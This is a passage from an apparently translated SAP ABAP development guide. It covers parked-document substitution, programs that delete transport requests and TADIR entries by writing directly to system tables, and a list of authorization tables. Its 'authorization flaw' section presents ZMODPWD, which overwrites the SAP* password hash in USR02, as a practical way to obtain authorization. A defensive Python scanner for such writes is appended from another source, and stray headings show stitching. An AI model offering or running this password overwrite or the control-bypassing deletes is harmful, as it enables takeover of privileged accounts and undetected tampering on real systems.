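5. Can substitution be used for parked documents?
This is like asking whether a person has a double set of eyebrows. The answer: generally not by birth, but a visit to a cosmetic surgery clinic can provide one. SAP standard programs do not allow substitution for parked documents, and there is no real need for it, because a parked document is not a posted document. For example, even if the posting date were substituted now according to some rule, the real posting would still follow the rules for normal documents, so the extra step would be redundant.
If you really do need substitution for parked documents, it is easy to set up. See the breakdown below.
(1) Start the debugger with /H and press F6 until execution reaches SAPMF05A screen number 1001, then set a breakpoint in module document_merge. This module is the entry point that decides whether substitution applies.
(2) For a parked document, g_status = 2.
Add the code as shown in the figure below, and substitution takes effect for FV50 parked documents.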
FI_VALIDATION_DOC
FI_VALIDATION_HEADER
FI_VALIDATION_ITEM
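6. Can substitution and validation be used for material documents?
If a financial document is generated at the same time as the material document, then of course they can be used.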
4. A brief analysis of BKPF|BSEG
5. Dunning
6. Check printing
5. CO module development examples
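6. Basis-related development examples
1. Deleting a transport request
Transport requests are described in detail in Chapter 2, Section 13. Below is a program showing how to delete a locked transport request; readers can extend it to fit their own situation.
Locked table objects can usually be unlocked with SM12; transport requests can be handled with the program below.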
Program ZSTDELREQ .
data : itab_e070 like e070 occurs 0 with header line,
* Request header including request user.
       iwa_e070c like e070c, "Request client
       itab_e071 like e071 occurs 0 with header line ,
* Request entry line items may include multiple lines
       iwa_e07t like e07t , "Request short text (desc)
       iwa_E070A like E070A ,
* If the request was locked and deleted, delete TLOCK as well, otherwise
* the program stays locked against any modification.
       itab_tlock like tlock occurs 0 with header line .
parameter reqno like e070-trkorr default '' .

select * into table itab_e070 from e070
  where trkorr eq reqno or strkorr eq reqno.
if SY-SUBRC Ne 0 .
  write : 'The Request No.:' , Reqno , ' not exist !' .
* exit .
endif .

select single * into iwa_e070c from e070c where trkorr eq reqno .
select * into table itab_e071 from e071 where trkorr eq reqno .
select single * into iwa_e07t from e07t where trkorr eq reqno .
select single * into iwa_E070A from e070A where trkorr eq reqno .

* [] tests the table body; without it the (empty) header line is tested.
if itab_e070[] IS INITIAL .
  select * into table itab_tlock from tlock where trkorr eq reqno .
else.
  select * into table itab_tlock from tlock
    FOR ALL ENTRIES IN itab_e070
    where TRKORR eq itab_e070-trkorr .
endif.
if SY-SUBRC NE 0 .
  write : / 'No Locked object for the request NO. was found!'.
endif .

* Remove the request header, client, entries, text, attributes and locks.
delete : e070 from table itab_e070 ,
         e070c from iwa_e070c,
         e071 from table itab_e071,
         e07t from iwa_e07t ,
         e070A from iwa_E070A ,
         tlock from table itab_tlock .
write : / 'The Request No.:' , Reqno , ' has already been successfully Full deleted'.
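If a program you developed sits in the $TMP package and you now want to transport it to QAS or PRD, its package has to be changed. A simple way is to delete its record from the repository object directory table TADIR (program below); the next time you change, save and activate the program, the Create Object Directory Entry window pops up again.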
Report zdelpackage.
data iwa_tadir like tadir .
select single * into iwa_tadir from tadir
  where OBJ_NAME = 'ZXMBCU02'. "change to your prog. name.
delete tadir from iwa_tadir.
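2. Checking a user's authorization list
3. A fatal SAP authorization control flaw
Although the SAP system provides a very thorough authorization control mechanism, fine-grained down to field level and even allowing user-defined authorization objects, the flaw in SAP authorization control is also fatal: any small program can easily obtain authorization.
As professional programmers, most of us have some interest in obtaining authorizations (which has spawned a crop of bored so-called hackers).
Readers can work through the following concepts on their own; they are not covered in detail here.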
[1].Activity(group)
[2].Authorization Object
[3].Profile
[4].Role
What actually determines authorization is the Authorization Object; a look at the function modules USR_USER_AUTH_FOR_OBJ_GET and AUTHORIZATION_DATA_READ_SELOBJ makes this clear.
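Common authorization-related T-codes:

(1) Role-related T-codes:
PFAC: standard
PFAC_CHG: change
PFAC_DEL: delete
PFAC_DIS: display
PFAC_INS: create
PFAC_STR
PFCG: create
ROLE_CMP: compare
SUPC: mass creation of role profiles
SWUJ: test
SU03: check authorizations
SU25, SU26: check profiles

(2) Creating users:
SU0
SU01
SU01D
SU01_NAV
SU05
SU1
SU10: mass
SU12: mass
SUCOMP: maintain user company address
SU2: change user parameters
SUIM: user information system, supports queries by multiple criteria

(3) Creating user groups:
SUGR: maintain
SUGRD: display
SUGRD_NAV: also maintain
SUGR_NAV: also display

(4) Maintaining and checking authorizations:
SU20|SU21: define your own authorization fields if you have special needs
SU50|SU51|SU52
SU53: use it to diagnose authorization problems
SU56: analyze authorization data buffers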
Common authorization-related tables:

TOBJ: All available authorization objects (all SAP default objects are here)
USR12: User-level authorization values
USR02: Password table
USR04: Authorization
USR03: User address data
USR05: User Master Parameter ID
USR06: Additional Data per User
USR07: Object/values of last authorization check that failed
USR08: Table for user menu entries
USR09: Entries for user menus (work areas)
USR10: User master authorization profiles
USR11: User Master Texts for Profiles (USR10)
USR12: User master authorization values
USR13: Short Texts for Authorizations
USR14: Surchargeable Language Versions per User
USR15: External User Name
USR16: Values for Variables for User Authorizations
USR20: Date of last user master reorganization
USR21: Assign user name address key
USR22: Logon data without kernel access
USR30: Additional Information for User Menu
USR40: Table for illegal passwords
USR41: Current users (all currently active users as seen in SM04)
USRBF2: Records all authorization objects of the current user
UST04: User Profile master
UST10C: Composite profiles
UST10S: Single profiles
UST12: Authorizations
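How can authorization be obtained? Here are a few practical examples.

Change the password of a highly privileged user. The following directly changes the SAP* password to 123. A single statement is enough.

report ZMODPWD.
tables :usr02 .
*Data ZUSR02 like USR02 .
*select single * into zUSR02 from USR02
*where BNAME = 'SAP*'.
*ZUSR02-BNAME = 'SAP*'.
*ZUSR02-Bcode = '9C8AB8600E74D864' .
*ZUSR02-UFLAG = '0' ."unlock SAP*
*Update USR02 from ZUSR02 .
update usr02 set bcode = 'DF52478E6FF90EEB' where BNAME = 'SAP*'.

In other words, the program above easily changes the SAP* password. The encryption algorithm is rendered completely useless here.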
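The programs in this section all write directly to USR02, TADIR or the transport tables, and a review of custom ABAP has to catch exactly that pattern. The Python scanner below is an added example, not code from the original page: its watch list and sample source are constructed, and it flags Open SQL writes to those tables, including chained statements, while ignoring comments and literals.

```python
import re

# Assumed watch list: the tables the programs on this page write to directly.
PROTECTED = {"USR02", "TADIR", "E070", "E070C", "E071", "E07T", "E070A", "TLOCK"}
DML = {"UPDATE", "DELETE", "INSERT", "MODIFY"}
LITERAL_OR_COMMENT = re.compile(r"'(?:[^']|'')*'|\".*")
STATEMENT = re.compile(r"\s*(\w+)\s*(:?)\s*(.*)", re.S)

def _clean(line):
    """Blank '*' comment lines; empty literals and drop inline '"' comments."""
    if line.startswith("*"):
        return ""
    return LITERAL_OR_COMMENT.sub(
        lambda m: "''" if m.group(0).startswith("'") else "", line)

def find_direct_writes(source):
    """Return (line, verb, table) for each Open SQL write to a watched table."""
    text = "\n".join(_clean(l) for l in source.splitlines())
    findings, line = [], 1
    for stmt in text.split("."):  # literals are emptied, so "." ends a statement
        lead = len(stmt) - len(stmt.lstrip())
        start = line + stmt[:lead].count("\n")
        line += stmt.count("\n")
        m = STATEMENT.match(stmt)
        if not m or m.group(1).upper() not in DML:
            continue
        # "DELETE : a FROM x, b FROM y." is chained: one target per part.
        parts = m.group(3).split(",") if m.group(2) else [m.group(3)]
        for part in parts:
            toks = part.upper().split()
            if toks and toks[0] in ("FROM", "INTO"):  # DELETE FROM t / INSERT INTO t
                toks = toks[1:]
            if toks and toks[0] in PROTECTED:
                findings.append((start, m.group(1).upper(), toks[0]))
    return findings

# Constructed sample, modelled on the programs above; values are placeholders.
SAMPLE = """\
report zsample.
* update usr02 set uflag = '0'.
write : / 'Request No.: deleted'.  "update tadir. (inline comment)
update usr02 set bcode = 'PLACEHOLDER' where bname = 'PLACEHOLDER'.
delete : e070 from table itab_e070 ,
         e07t from iwa_e07t ,
         tlock from table itab_tlock .
delete itab_e070 where trkorr = reqno.
delete tadir from iwa_tadir.
"""

if __name__ == "__main__":
    for line, verb, table in find_direct_writes(SAMPLE):
        print(f"line {line}: {verb} on {table}")
```

Internal-table operations such as the `delete itab_e070` line are not reported because their target is not on the watch list; dynamic table names in parentheses are outside what this static check can see.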